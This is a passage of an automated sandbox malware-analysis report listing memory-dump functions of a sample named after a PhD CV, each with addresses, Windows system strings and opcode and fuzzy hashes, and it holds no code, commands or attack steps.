                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MUI
                                                                                                  • API String ID: 0-1339004836
                                                                                                  • Opcode ID: b5dc59372d9c8f179f102dd7543a76f4d33ce424faaf1e1eca02272e830171e5
                                                                                                  • Instruction ID: fe445bfff711dd2e8d46ba9acc737ce00a37b6fb7c98292a97a82c8819789f9e
                                                                                                  • Opcode Fuzzy Hash: b5dc59372d9c8f179f102dd7543a76f4d33ce424faaf1e1eca02272e830171e5
                                                                                                  • Instruction Fuzzy Hash: 54826C75E012189FDB64CFA9C8807ADBBB5FF48710F14816AEC19AB291D7349D81EB90
                                                                                                  Function 00FDC7B0 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: w
                                                                                                  • API String ID: 0-476252946
                                                                                                  • Opcode ID: 9479c0af39ae103951ca7ce153df30c1773994f9391b6f2b357d32f574f36c7f
                                                                                                  • Instruction ID: 65fb16e95cdf36af1fc30518ad8bad9b29e3e8c337f4f49227ee0a6c2f404b33
                                                                                                  • Opcode Fuzzy Hash: 9479c0af39ae103951ca7ce153df30c1773994f9391b6f2b357d32f574f36c7f
                                                                                                  • Instruction Fuzzy Hash: BCD1CF3190020AABDB24CF54C492ABEFBB2FF44714F18855BE89997341E735ED82E790
                                                                                                  Function 00FE47B4 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: f17404ab1f35dd1fedc509417887bc5ab96c5c688d223678ddbb8f94fe13081d
                                                                                                  • Instruction ID: a910369b063e312845a3b9f8be0cc4a0d94381d36388becaac35bde9106bcfb3
                                                                                                  • Opcode Fuzzy Hash: f17404ab1f35dd1fedc509417887bc5ab96c5c688d223678ddbb8f94fe13081d
                                                                                                  • Instruction Fuzzy Hash: 64A1AE71E4028AAFDB11DFA5C881BAEB7B8EF08750F14403EE911E7251E778AD40EB54
                                                                                                  Function 00FC60A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: 68f9270615fc5e1bc9e937687f811961601d3aab341d9f3cfe3588c5fc335e9b
                                                                                                  • Instruction ID: 5871eae4e97a03149f5708b173c553016b341f56ee078209adf49c8b03938239
                                                                                                  • Opcode Fuzzy Hash: 68f9270615fc5e1bc9e937687f811961601d3aab341d9f3cfe3588c5fc335e9b
                                                                                                  • Instruction Fuzzy Hash: AA918372940219BBDB21DF99CD56FAE77B8EF09B50F140019F600EB292DB75AD04EB90
                                                                                                  Function 00F7A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GlobalTags
                                                                                                  • API String ID: 0-1106856819
                                                                                                  • Opcode ID: 2956c076cdc29130e26b66c8fc03aee626fcb18394b74d0c2e76ec452d208fab
                                                                                                  • Instruction ID: 896790cb8d42f17b4c87a8e25b3c18492c372514976c42d387dbbd58a2b23340
                                                                                                  • Opcode Fuzzy Hash: 2956c076cdc29130e26b66c8fc03aee626fcb18394b74d0c2e76ec452d208fab
                                                                                                  • Instruction Fuzzy Hash: 17716F75E002199FDF24DF99D980AEDBBB2BF58710F18812AE805EB245D7398D41EF50
                                                                                                  Function 00F502F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #%u
                                                                                                  • API String ID: 0-232158463
                                                                                                  • Opcode ID: 6d2dc03995073e94cb2431eb81b66f98171eaf0b8d8040c8e39e198c9730faa6
                                                                                                  • Instruction ID: b1c055f0bccfc33a68f9316230ab0db270ae1b3a79105ba19638c6b6dc220fea
                                                                                                  • Opcode Fuzzy Hash: 6d2dc03995073e94cb2431eb81b66f98171eaf0b8d8040c8e39e198c9730faa6
                                                                                                  • Instruction Fuzzy Hash: 94716AB1E001099FDB01DFA8CD85BAEB7F8EF48744F144065EA01E7251EA78ED04DBA0
                                                                                                  Function 00FE44F8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .mui
                                                                                                  • API String ID: 0-1199573805
                                                                                                  • Opcode ID: 46308f953e1e0bc888eab7afd31489a0a9c8869e06c1e2077ab42aa911e207c8
                                                                                                  • Instruction ID: 068b6d24d41ca61211fed8c27e489400ab3e929315e02de2c3edb2329f262994
                                                                                                  • Opcode Fuzzy Hash: 46308f953e1e0bc888eab7afd31489a0a9c8869e06c1e2077ab42aa911e207c8
                                                                                                  • Instruction Fuzzy Hash: FC519772D003A99BCF10DF96C840AAEB7B4BF49B10F05412DEA11EB251D778AD01EF90
                                                                                                  Function 00F5E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EXT-
                                                                                                  • API String ID: 0-1948896318
                                                                                                  • Opcode ID: 2febb2a59e1b2ba6f6f00b1de011901d19dad94ff388b7cc9d9b1b219834af85
                                                                                                  • Instruction ID: 66fa9a31212d908cf357ecd0e688cedade681a85b67fe2f73c3a2004bcf92477
                                                                                                  • Opcode Fuzzy Hash: 2febb2a59e1b2ba6f6f00b1de011901d19dad94ff388b7cc9d9b1b219834af85
                                                                                                  • Instruction Fuzzy Hash: 7E41E5729183019BD714DB64C845B5BB7D8AF88755F04092DFA84D7181E678DE08A793
                                                                                                  Function 00F3CD8A Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AlternateCodePage
                                                                                                  • API String ID: 0-3889302423
                                                                                                  • Opcode ID: 7e72f80ffeb5a9b100b01fb7b5404381f678d707d2e70e69a25b81a0ad0babd1
                                                                                                  • Instruction ID: 0c2a5f739eef8f8c9cfcf7937d81621ba941e07a6bf5a139d109c52daa4bec3f
                                                                                                  • Opcode Fuzzy Hash: 7e72f80ffeb5a9b100b01fb7b5404381f678d707d2e70e69a25b81a0ad0babd1
                                                                                                  • Instruction Fuzzy Hash: B941B376D00209AADF24DF99CC81EEEB7B8FF84720F14416AE511E7250D6359F41EB91
                                                                                                  Function 00F741BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                  • Instruction ID: e123d0dffa4f34ab9cdeb31b91df14c37c32c2c9feeccb1f768ae33923aab174
                                                                                                  • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                  • Instruction Fuzzy Hash: 31519E72604711AFC320DF19C841A6BB7F8FF48B10F00892EFA95976A1E774E914DB91
                                                                                                  Function 00FCCB20 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 83a803f9e8bb26f6d699ecb80bf2c33cf4ab8c4779c9bd049dde12988674c264
                                                                                                  • Instruction ID: 4486767ff07e401067cd642cc1f90b0fdccd73ae6ba5506a8bcb95067bf87626
                                                                                                  • Opcode Fuzzy Hash: 83a803f9e8bb26f6d699ecb80bf2c33cf4ab8c4779c9bd049dde12988674c264
                                                                                                  • Instruction Fuzzy Hash: 5A41AF72E002559FCB21DF99C982BADBBB8FF44B10F00812EE949DB255D778D901EB90
                                                                                                  Function 00FFADD6 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PreferredUILanguages
                                                                                                  • API String ID: 0-1884656846
                                                                                                  • Opcode ID: d659630736a261c23cfbb89f89970cf211bff125ff607868f4e084b01e399737
                                                                                                  • Instruction ID: 20be219a6575532d440f7e33d03e3900dc1242b7ecb8a7602b870174747bd025
                                                                                                  • Opcode Fuzzy Hash: d659630736a261c23cfbb89f89970cf211bff125ff607868f4e084b01e399737
                                                                                                  • Instruction Fuzzy Hash: 384195B2D0021DABCB12DB94CC40BFEB379AF44760F154166EA15BB2A0D734DE40E7A1
                                                                                                  Function 00FBC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryHash
                                                                                                  • API String ID: 0-2202222882
                                                                                                  • Opcode ID: 219be359e32506e3f06014b778e67eec79f50be097b56b51789d7bffdbcac10a
                                                                                                  • Instruction ID: 78fa06d4ea27231ec85882f8d5c95b1f77d84cdab8eb900f7676f7bff946725e
                                                                                                  • Opcode Fuzzy Hash: 219be359e32506e3f06014b778e67eec79f50be097b56b51789d7bffdbcac10a
                                                                                                  • Instruction Fuzzy Hash: D14121B190012DABDB21EA50CC95FEFB77CAB44714F0045A5EA08A7141DB74AE899FA4
                                                                                                  Function 00FE6BDE Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: kLsE
                                                                                                  • API String ID: 0-3058123920
                                                                                                  • Opcode ID: 598e0b814a21921bc1be8d3812c40cdc7d4ba3df514ce6330311d3bdf94f7f84
                                                                                                  • Instruction ID: 7596bb8b22f03539de41fe12286bdbe7564e4ace42d13bcb554d587622bd3c71
                                                                                                  • Opcode Fuzzy Hash: 598e0b814a21921bc1be8d3812c40cdc7d4ba3df514ce6330311d3bdf94f7f84
                                                                                                  • Instruction Fuzzy Hash: EE41483190139556E331AB65EC857A53BA8FB507B9F24011AECC0CA1C5CB7E4A85E7A0
                                                                                                  Function 00FBC920 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TrustedInstaller
                                                                                                  • API String ID: 0-565535830
                                                                                                  • Opcode ID: 8536f965075c3303e2bb857d392a0766f3e133fcf81c74362a0e9528de86d5ee
                                                                                                  • Instruction ID: 17535838523256e6850244016ea952d2581a355136cb0ef0b547c0e625458eeb
                                                                                                  • Opcode Fuzzy Hash: 8536f965075c3303e2bb857d392a0766f3e133fcf81c74362a0e9528de86d5ee
                                                                                                  • Instruction Fuzzy Hash: F8317032940619BADB22EB94CC51FEFB77CEB44B50F000129FA00EB151D6789E44EBD0
                                                                                                  Function 00FD66D0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-1885708031
                                                                                                  • Opcode ID: d5292d5053305f92ab1b2c9201bdbeb0c0f6a126fdee2d40f5607cd72e3d8359
                                                                                                  • Instruction ID: 15800e88886158b0958779cdd5c37d5e295269f406022a83faa002078c0fa6f1
                                                                                                  • Opcode Fuzzy Hash: d5292d5053305f92ab1b2c9201bdbeb0c0f6a126fdee2d40f5607cd72e3d8359
                                                                                                  • Instruction Fuzzy Hash: E631F831A0061D9ADB21DE68C844FEE77B99F45B18F18402AF940DB382DF7AED04DB90
                                                                                                  Function 00FE0AE0 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 5ab56d2b180bb44ac9b81ade9d7e8da0aada14e332b8b9d6ea5bba702a491824
                                                                                                  • Instruction ID: 8281904fec6fefb37c21e243c49e3e3f3de2a4e530c4b166f4b340abaee44603
                                                                                                  • Opcode Fuzzy Hash: 5ab56d2b180bb44ac9b81ade9d7e8da0aada14e332b8b9d6ea5bba702a491824
                                                                                                  • Instruction Fuzzy Hash: 91317A71108385AFD315DF15CC06E9BBBE8FB84764F404A2EB59492190EBB4E948DB92
                                                                                                  Function 00FBC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryName
                                                                                                  • API String ID: 0-215506332
                                                                                                  • Opcode ID: 30edc0e5651b6c3b7748147d4d90e331b60f82a76a10826ad782281d20f6f673
                                                                                                  • Instruction ID: 675bd2d653b7f5c15930fd6c3362cddff989868dc5555f1911b8f6e3e73ed154
                                                                                                  • Opcode Fuzzy Hash: 30edc0e5651b6c3b7748147d4d90e331b60f82a76a10826ad782281d20f6f673
                                                                                                  • Instruction Fuzzy Hash: D531C376D0051AAFDB15DB5AC845EAFB7B4EB80B20F214129E901A7291DB309E04EFE0
                                                                                                  Function 00FDAA40 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00FDAABF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                  • API String ID: 0-1911121157
                                                                                                  • Opcode ID: cd72fcd1e9ad5ea7564e53e59e21b688e22736527fdc2a8a70f9872061009030
                                                                                                  • Instruction ID: ecca3ee31ca404b7a31634d5ad6708c286a42c1b5a28321b05a17962d9c0665f
                                                                                                  • Opcode Fuzzy Hash: cd72fcd1e9ad5ea7564e53e59e21b688e22736527fdc2a8a70f9872061009030
                                                                                                  • Instruction Fuzzy Hash: 3A3102B2E00608EBDB11DB54CD45F9AB7BAFB84B20F14822AF504A7684D73DAC01DB91
                                                                                                  Function 00F68BD1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: WindowsExcludedProcs
                                                                                                  • API String ID: 0-3583428290
                                                                                                  • Opcode ID: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
                                                                                                  • Instruction ID: 95cd010e255543d2f8b8fa4a5529620508f85e77464d17e5f7910ed14b97b1ae
                                                                                                  • Opcode Fuzzy Hash: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
                                                                                                  • Instruction Fuzzy Hash: 1721D777902614BBCB229A59C884F9B77ADDF82BE0F154129B905AB114CA34DD02F7B0
                                                                                                  Function 00FC0CEE Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrCreateEnclave
                                                                                                  • API String ID: 0-3262589265
                                                                                                  • Opcode ID: 85b2842f49f3de4865ba9e39741fa60a9d32214dae8e8b396c9e7b5f753f4e26
                                                                                                  • Instruction ID: e59d4767104d4c296a43b9dbcadd8991f3a4a59483286f24d7d8acc8e6942ece
                                                                                                  • Opcode Fuzzy Hash: 85b2842f49f3de4865ba9e39741fa60a9d32214dae8e8b396c9e7b5f753f4e26
                                                                                                  • Instruction Fuzzy Hash: 6F2125B19083409FC320DF1AC946A9BFBE8FBD5B10F00491EB9A487251DBB5D844CB92
                                                                                                  Function 00FC85AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FC85DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                  • API String ID: 0-702105204
                                                                                                  • Opcode ID: 2094d80e436d3ffb5e908cbc3409d6484ef414e014100797b496e699bc635bec
                                                                                                  • Instruction ID: 61b8837b6daec1e03240f8b3010b51a0c0586fbffbe3902f97a5a04c32fb56e6
                                                                                                  • Opcode Fuzzy Hash: 2094d80e436d3ffb5e908cbc3409d6484ef414e014100797b496e699bc635bec
                                                                                                  • Instruction Fuzzy Hash: 12012632A002029BC7306A52EE87F963B69EF413B4F08042CF58117463CF69AC82FB94
                                                                                                  Function 00FF6B77 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Critical error detected %lx, xrefs: 00FF6BA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Critical error detected %lx
                                                                                                  • API String ID: 0-802127002
                                                                                                  • Opcode ID: 89fbca27458d0d93fe1e1948bcece3031efb25940a9555e3f816331f7e835a65
                                                                                                  • Instruction ID: bd0b0826bb0eadb539981c64622cc0b841f6cf14e2039c15e368bba6038f4417
                                                                                                  • Opcode Fuzzy Hash: 89fbca27458d0d93fe1e1948bcece3031efb25940a9555e3f816331f7e835a65
                                                                                                  • Instruction Fuzzy Hash: 3D118BB6D443088BEB25DFA4C906BEDBBB0EB44724F20452ED255EB292E7740601DF00
                                                                                                  Function 00F8088E Relevance: .6, Instructions: 606COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3cd7a3092796b521d3f21cbfb5537cf6a04581d97d08b2d2aaab33bf9f8bb3a9
                                                                                                  • Instruction ID: 0c42f52c8a6bd66dff6d2cf86a4d4400d9a8768ed71a7d2c05afad7cde7c2be5
                                                                                                  • Opcode Fuzzy Hash: 3cd7a3092796b521d3f21cbfb5537cf6a04581d97d08b2d2aaab33bf9f8bb3a9
                                                                                                  • Instruction Fuzzy Hash: 374269729007159FDB60DF64C881BEAB7F5BF04310F1485A9E999DB242EB70EA84DF60
                                                                                                  Function 00F52760 Relevance: .6, Instructions: 605COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1672f4dbaa4bd96d28e9f99bf2741bd49c1bff1cedd8b4b5edcc540002f8f4c3
                                                                                                  • Instruction ID: b7059f900669d60cbdbdabdc79ec8c97973ceedfaa9395d98c67f19c0a59ebf6
                                                                                                  • Opcode Fuzzy Hash: 1672f4dbaa4bd96d28e9f99bf2741bd49c1bff1cedd8b4b5edcc540002f8f4c3
                                                                                                  • Instruction Fuzzy Hash: BB32DFB0E007558FDB24CF69C8447BEBBF2AF86714F28411DD846DB684DB39A846EB50
                                                                                                  Function 00F68CDF Relevance: .6, Instructions: 554COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f25010e415107486e60dc38b0042e9a05e9110c560b6abfebb7b0c3852766ed7
                                                                                                  • Instruction ID: 50b380169fa521e767855560e2dd9e2bd7f1adfdef7d53ef1363e23d055842b0
                                                                                                  • Opcode Fuzzy Hash: f25010e415107486e60dc38b0042e9a05e9110c560b6abfebb7b0c3852766ed7
                                                                                                  • Instruction Fuzzy Hash: 1A2271B1E0021A9BCF14CF95C8806BEF7F6BF55350B24815AE856AB241EB74DD42EB60
                                                                                                  Function 00F46970 Relevance: .5, Instructions: 548COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 37e6f9a3226b0d876d1508fcc26bad45bb7a108bd85f9e8764805fe0d409f652
                                                                                                  • Instruction ID: e35baa7c812e99c4637468f8f898d9c8a890d956ac0f20dc3cae5da5854bbe38
                                                                                                  • Opcode Fuzzy Hash: 37e6f9a3226b0d876d1508fcc26bad45bb7a108bd85f9e8764805fe0d409f652
                                                                                                  • Instruction Fuzzy Hash: 97327971A00605DFDB24CFA8C880BAABBF1FF49310F248569E955EB291DB34EC45EB51
                                                                                                  Function 00F64955 Relevance: .4, Instructions: 423COMMON
